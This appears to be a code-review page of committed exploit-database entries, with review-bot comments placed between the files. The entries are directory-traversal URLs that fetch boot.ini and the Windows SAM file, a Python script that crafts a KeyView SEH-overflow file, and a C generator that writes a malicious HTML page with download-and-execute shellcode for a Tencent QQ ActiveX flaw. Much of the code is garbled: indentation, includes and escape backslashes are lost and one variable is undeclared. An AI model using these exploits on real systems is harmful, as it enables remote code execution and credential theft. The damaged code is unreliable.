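Review bot: the format-string values are split mid-token (`...%x.%` ending one line, `x.%x` starting the next), so it is ambiguous whether the line breaks are part of the PoC or wrapping introduced when the file was committed; check the source advisory and keep each value on a single line. The entry also never says which client-side file the `<Connection name=>` and `<HostName>` elements belong to, so the "remote" in the title is not explained by the visible text; one sentence naming the file type that carries these fields would make the severity claim verifiable.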

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/26583/info
Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects Protection Server 7.0.0 through 7.4.0, and Keys Server 1.0.3; earlier versions may also be vulnerable.
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam
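Review bot: "Sentinel Protection Server and Keys Server are prone to a directory-traversal vulnerability because it fails" has a number mismatch (`they fail`). The two request lines use ports 6002 and 7002 without saying which of the two services listens on which port, and the affected-version sentence lists Protection Server 7.0.0 through 7.4.0 and Keys Server 1.0.3 but gives no fixed version; both would help a reader confirm exposure from a port inventory or version check.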

View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/26604/info
Autonomy KeyView is prone to multiple buffer-overflow vulnerabilities.
Successfully exploiting these issues could allow an attacker to execute arbitrary code in the context of the user running the application.
Multiple applications incorporate the vulnerable KeyView component, so they are also considered vulnerable to these issues.
NOTE: These issues are similar to those described in BID 26175 (Autonomy KeyView Multiple Buffer Overflow Vulnerabilities) but affect a different component.
from sys import argv
from struct import pack
def createMaliciousFile(filename):
seh_offset = 0x9c4
jumper = 0x06ad890d # pop pop ret ... CHANGE IT! (dll is rebased)
shellcode = '\x90' * 0x400 + '\xCC' # nopsled and int 3
content = '\x00\x00' # header record type
content += '\x1a\x00' # header length
content += '\x05\x10\x04\x00\x00\x00\x00\x00\x09\x00\x00\x01'
content += '\x01\x00\x30\x8d\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00'
content += '\x1b\x00' # vulnerable record type
payload = ''
payload += '\x90' * (seh_offset - 4) #others too
payload += '\xeb\x06\x90\x90' # jmp six bytes forward
payload += pack('<L', jumper)
payload += shellcode
content += pack('<H', len(payload))
content += payload
fd = open(filename, 'wb')
fd.write(content)
fd.close()
if len(argv) is not 2:
print '[-] Must specify a filename. Remember to change the pop pop ret address! :)'
else:
createMaliciousFile(argv[1])
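Review bot: `if len(argv) is not 2:` compares an integer with `is not`; that only works because CPython interns small integers and should be `!= 2`. The indentation of the function body and the `if`/`else` block has been lost in the committed text (every line starts in column 0), so the file is not runnable Python until it is restored, and the header claims 41 lines while only about 25 are shown, which suggests blank lines or comments were dropped as well. The code is Python 2 (`print '...'`, `str` payloads written in binary mode), which should be stated in the entry. The comment on `jumper` says the address must be changed because the DLL is rebased, but the entry never records which KeyView version the offsets (`seh_offset = 0x9c4`) were taken from, so a reader cannot tell which builds the advisory's version list actually covers.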

229
platforms/windows/remote/30819.c Executable file
View file

@ -0,0 +1,229 @@
source: http://www.securityfocus.com/bid/26613/info
Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
These issues affect Tencent QQ 2006 and prior versions.
#include
#include
#include
FILE *fp = NULL;
char *file = "fuck_exp1.html";
char *url = NULL;
unsigned char sc[] =
"x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70"
"x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8"
"xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00"
"x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00"
"x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45"
"x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40"
"x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75"
"x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00"
"x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5"
"x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a"
"x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c"
"x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c"
"x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45"
"x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59"
"x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08"
"x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00"
"x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03"
"xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7"
"x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c"
"x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41"
"xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d"
"x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24"
"x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5"
"x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e"
"x00";
char * header =
" "
" "
" "
" ";
char * trigger =
" "
" "
" "
" "
" ";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i{
if((i%16)==0)
{
if(i!=0)
{
printf("" "");
fprintf(fp, "%s", "" + "");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//?shellcode???header??,??? " ) " ??
printf(""; ");
fprintf(fp, "%s", ""); ");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Tencent QQ VQQPlayer.ocx (all version) 0day! ");
printf("Bug Found by axis@ph4nt0m ");
printf("Date: 2006-12-27 ");
printf(" Usage: %s [Local htmlfile] ", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' ");
return;
}
printf("[+] download url:%s ", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s ", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error! ");
return;
}
//build evil html file
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger);
fflush(fp);
printf("[+] exploit write to %s success! ", file);
}
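Review bot: the file does not compile as shown: the three `#include` lines have no header names, `footer` is written at `fprintf(fp, "%s", footer);` but is never declared, the loop `for(i=0;i{` has lost its condition, and `if( (!strstr(url, "http://") && !strstr(url, "ftp://")) strlen(url) < 10)` is missing an operator between the two conditions. Everything that looked like an HTML tag seems to have been stripped on the way in: the `header` and `trigger` literals are reduced to whitespace, every `<`-containing expression is truncated, and the `\x` escapes in `sc[]` have lost their backslashes, so the array as committed is plain ASCII text. The committed text is a rendered copy rather than the original source and should be replaced from the advisory. Minor: `void main` should be `int main`, and the comment at `//?shellcode???header??` is mojibake from a non-UTF-8 source encoding.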